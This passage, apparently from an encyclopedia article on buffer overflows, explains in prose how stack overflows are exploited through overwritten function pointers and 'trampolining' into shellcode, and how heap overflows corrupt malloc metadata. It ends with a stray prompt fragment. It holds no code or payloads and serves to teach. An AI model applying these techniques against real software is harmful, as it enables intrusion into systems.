<Li> By overwriting a function pointer or exception handler, which is subsequently executed </Li> <Li> By overwriting a local variable (or pointer) of a different stack frame, which will be used by the function which owns that frame later . </Li> <P> If the address of the user - supplied data used to affect the stack buffer overflow is unpredictable, exploiting a stack buffer overflow to cause remote code execution becomes much more difficult . One technique that can be used to exploit such a buffer overflow is called "trampolining". In that technique, an attacker will find a pointer to the vulnerable stack buffer, and compute the location of their shellcode relative to that pointer . Then, they will use the overwrite to jump to an instruction already in memory which will make a second jump, this time relative to the pointer; that second jump will branch execution into the shellcode . Suitable instructions are often present in large code . The Metasploit Project, for example, maintains a database of suitable opcodes, though it lists only those found in the Windows operating system . </P> <P> A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a manner different from that of stack - based overflows . Memory on the heap is dynamically allocated by the application at run - time and typically contains program data . Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers . The canonical heap overflow technique overwrites dynamic memory allocation linkage (such as malloc meta data) and uses the resulting pointer exchange to overwrite a program function pointer . </P>

By manipulating a buffer overflow an attacker can jump